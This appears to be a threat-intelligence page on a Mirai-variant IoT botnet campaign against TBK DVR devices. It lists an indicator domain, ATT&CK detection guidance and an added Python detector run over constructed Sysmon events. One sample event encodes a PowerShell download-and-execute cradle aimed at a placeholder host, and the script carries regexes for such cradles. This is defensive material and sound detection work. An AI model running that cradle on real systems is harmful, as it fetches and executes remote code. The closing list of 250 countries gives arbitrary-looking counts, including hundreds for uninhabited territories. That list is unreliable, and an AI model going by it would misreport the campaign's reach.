Nexcorium TBK DVR Campaign

Tags: Mirai variant, Nexcorium, Nexus Team, CVE-2024-3721, CVE-2017-17215, DDoS, IoT botnet, persistence mechanisms, brute-force attacks, multi-architecture malware
A multi-architecture Mirai variant exploiting CVE-2024-3721 in TBK DVR devices to deliver persistent IoT botnet malware. The campaign leverages vulnerability-driven attacks to gain initial access, establish persistence, and launch large-scale DDoS attacks across diverse architectures.

Indicators of Compromise

r3brqw3d.b0ats.top

Campaign Guidance

Detections

Each entry gives the technique ID and name, the tactic, the detection method and the log sources.

T1055 Process Injection (Tactic: Defense Evasion)
Detection Method: Monitor for abnormal cross-process memory operations (OpenProcess → WriteProcessMemory → CreateRemoteThread chain). Alert on legitimate system processes initiating unexpected outbound network connections, which may indicate a hijacked process.
Log Sources: Sysmon EID 8/10, Windows Security EID 4656/4663, EDR process telemetry

T1498 Network Denial of Service (Tactic: Impact)
Detection Method: Detect anomalous spikes in inbound packets-per-second or bandwidth utilization using threshold-based alerting. Look for geographic distribution anomalies and single-source request rate patterns indicative of botnet coordination.
Log Sources: NetFlow/IPFIX, firewall logs, CDN/scrubbing-center metrics

T1080 Taint Shared Content (Tactic: Lateral Movement)
Detection Method: Alert on executable files (.exe, .dll, .lnk, .bat, .ps1) written to shared network directories. Use File Integrity Monitoring (FIM) to detect hash changes on previously clean files in collaboration shares.
Log Sources: Sysmon EID 11, Windows Security EID 4663, FIM solution logs

T1566 Phishing (Tactic: Initial Access)
Detection Method: Detonate email attachments in sandbox environments. Detect child process spawning from Office applications (winword.exe, excel.exe → cmd.exe, powershell.exe, wscript.exe). Correlate URL clicks with subsequent download or shell activity on the same host.
Log Sources: Email gateway logs, Sysmon EID 1, proxy/web gateway, MDE alerts

T1059 Command and Scripting Interpreter (Tactic: Execution)
Detection Method: Monitor for PowerShell launched with -EncodedCommand or download cradle patterns (IEX, Invoke-Expression, WebClient). Alert on script interpreters spawned by unusual parent processes. Enable AMSI and PowerShell Script Block Logging for full command visibility.
Log Sources: Sysmon EID 1/4104, PowerShell Script Block Log, Windows Security EID 4688, auditd execve
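The following is an added example, not code from the page or from the Nexus Team tooling: it implements the host-side rules from the detection table (T1566 Office-to-shell spawning, T1059 -EncodedCommand and download-cradle tokens, the T1055 CreateRemoteThread step, and outbound DNS/network contact with the campaign IoC domain listed above) over newline-delimited JSON events. The field names (EventID, Image, ParentImage, CommandLine, SourceImage, TargetImage, QueryName, DestinationHostname) follow Sysmon's schema, which is an assumption about the log export; the sample events and the encoded script are constructed for the demonstration.

```python
"""Detection rules from the campaign's detection table, applied to constructed
Sysmon-style JSON events. Added example: the events are constructed and the
field names follow Sysmon's schema (an assumption about the log source)."""
from __future__ import annotations

import base64
import json
import re
from typing import Iterable

# Campaign IoC taken from the Indicators of Compromise section of this page.
IOC_DOMAINS = {"r3brqw3d.b0ats.top"}

# T1566 row: Office parents spawning script/shell interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe"}

# T1059 row: -EncodedCommand (and its short forms) and download-cradle tokens.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE_RE = re.compile(r"\b(IEX|Invoke-Expression|WebClient)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str | None:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event: dict) -> list[tuple[str, str]]:
    """Apply the table's rules to one event; returns (technique, reason) pairs."""
    alerts: list[tuple[str, str]] = []
    eid = event.get("EventID")
    if eid == 1:  # Sysmon EID 1: process creation
        image = basename(event.get("Image", ""))
        parent = basename(event.get("ParentImage", ""))
        cmdline = event.get("CommandLine", "")
        if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
            alerts.append(("T1566", f"{parent} spawned {image}"))
        if image == "powershell.exe":
            decoded = decode_encoded_command(cmdline)
            if decoded is not None:
                alerts.append(("T1059", "PowerShell launched with -EncodedCommand"))
            # Search the decoded script first so the cradle token is reported from it.
            m = CRADLE_RE.search((decoded or "") + " " + cmdline)
            if m:
                alerts.append(("T1059", f"download cradle token {m.group(1)}"))
    elif eid == 8:  # Sysmon EID 8: CreateRemoteThread, last step of the T1055 chain
        src = basename(event.get("SourceImage", ""))
        tgt = basename(event.get("TargetImage", ""))
        if src != tgt:
            alerts.append(("T1055", f"{src} created a remote thread in {tgt}"))
    elif eid in (3, 22):  # Sysmon EID 3 (network connection) / EID 22 (DNS query)
        host = (event.get("DestinationHostname") or event.get("QueryName") or "").lower()
        if host in IOC_DOMAINS:
            alerts.append(("IoC", f"{basename(event.get('Image', ''))} contacted {host}"))
    return alerts


def scan(lines: Iterable[str]) -> list[tuple[str, str]]:
    """Run evaluate() over newline-delimited JSON events and collect the alerts."""
    alerts: list[tuple[str, str]] = []
    for line in lines:
        if line.strip():
            alerts.extend(evaluate(json.loads(line)))
    return alerts


# Constructed sample script, encoded the way PowerShell expects (UTF-16LE, base64).
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16le")
).decode("ascii")

# Constructed events: one hit per rule plus two benign ones. Not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED_SAMPLE}"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"EventID": 8, "SourceImage": r"C:\Users\u\AppData\Local\Temp\upd.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 22, "Image": r"C:\Windows\explorer.exe", "QueryName": "r3brqw3d.b0ats.top"},
    {"EventID": 3, "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationHostname": "updates.example.invalid"},
]


def sample_event_lines() -> list[str]:
    """The constructed events serialised as JSON lines, as a log export would be."""
    return [json.dumps(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for technique, reason in scan(sample_event_lines()):
        print(f"{technique}: {reason}")
```

Running the block prints five alerts: the Office-spawned PowerShell event trips T1566 once and T1059 twice (encoded command, then the IEX token recovered from the decoded script), the remote-thread event trips T1055, and the DNS query trips the IoC match; the two benign events produce nothing. Note that the log sources in the table are Windows endpoint telemetry, while this campaign compromises TBK DVR devices; on those devices there is no Sysmon, so the network-side rules (the IoC domain match here and the T1498 NetFlow thresholds) are the ones that apply to the infected hosts themselves.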

Observed Countries (250)

AD (548)
AE (24)
AF (407)
AG (464)
AI (346)
AL (359)
AM (809)
AO (58)
AQ (86)
AR (35)
AS (405)
AT (640)
AU (380)
AW (805)
AX (762)
AZ (901)
BA (212)
BB (721)
BD (509)
BE (136)
BF (889)
BG (767)
BH (355)
BI (543)
BJ (662)
BL (347)
BM (285)
BN (855)
BO (765)
BQ (595)
BR (385)
BS (134)
BT (873)
BV (46)
BW (210)
BY (363)
BZ (943)
CA (266)
CC (545)
CD (659)
CF (366)
CG (151)
CH (893)
CI (100)
CK (138)
CL (467)
CM (677)
CN (484)
CO (307)
CR (835)
CU (853)
CV (293)
CW (62)
CX (562)
CY (50)
CZ (412)
DE (468)
DJ (80)
DK (542)
DM (67)
DO (600)
DZ (488)
EC (930)
EE (394)
EG (918)
EH (113)
ER (557)
ES (75)
ET (3)
FI (912)
FJ (554)
FK (225)
FM (963)
FO (922)
FR (21)
GA (294)
GB (79)
GD (891)
GE (378)
GF (16)
GG (764)
GH (872)
GI (658)
GL (949)
GM (877)
GN (22)
GP (143)
GQ (469)
GR (194)
GS (605)
GT (99)
GU (565)
GW (199)
GY (474)
HK (212)
HM (333)
HN (127)
HR (370)
HT (214)
HU (393)
ID (287)
IE (774)
IL (579)
IM (426)
IN (386)
IO (893)
IQ (340)
IR (765)
IS (684)
IT (175)
JE (876)
JM (475)
JO (740)
JP (491)
KE (305)
KG (751)
KH (960)
KI (953)
KM (645)
KN (276)
KP (68)
KR (413)
KW (959)
KY (83)
KZ (204)
LA (488)
LB (148)
LC (771)
LI (828)
LK (979)
LR (942)
LS (477)
LT (221)
LU (42)
LV (272)
LY (579)
MA (763)
MC (440)
MD (817)
ME (126)
MF (730)
MG (29)
MH (158)
MK (115)
ML (742)
MM (937)
MN (271)
MO (452)
MP (39)
MQ (825)
MR (875)
MS (290)
MT (48)
MU (808)
MV (660)
MW (275)
MX (129)
MY (909)
MZ (338)
NA (165)
NC (447)
NE (705)
NF (869)
NG (247)
NI (103)
NL (482)
NO (720)
NP (591)
NR (193)
NU (857)
NZ (683)
OM (79)
PA (132)
PE (951)
PF (874)
PG (461)
PH (452)
PK (81)
PL (766)
PM (878)
PN (873)
PR (962)
PS (457)
PT (872)
PW (823)
PY (163)
QA (532)
RE (846)
RO (829)
RS (19)
RU (828)
RW (246)
SA (909)
SB (571)
SC (317)
SD (302)
SE (820)
SG (37)
SH (895)
SI (124)
SJ (415)
SK (490)
SL (388)
SM (485)
SN (603)
SO (94)
SR (259)
SS (348)
ST (707)
SV (491)
SX (709)
SY (871)
SZ (179)
TC (372)
TD (815)
TF (88)
TG (745)
TH (363)
TJ (375)
TK (357)
TL (324)
TM (864)
TN (768)
TO (881)
TR (131)
TT (509)
TV (585)
TW (81)
TZ (616)
UA (459)
UG (439)
UM (144)
US (855)
UY (414)
UZ (891)
VA (116)
VC (554)
VE (170)
VG (768)
VI (567)
VN (968)
VU (220)
WF (947)
WS (404)
XK (546)
YE (578)
YT (5)
ZA (417)
ZM (58)
ZW (663)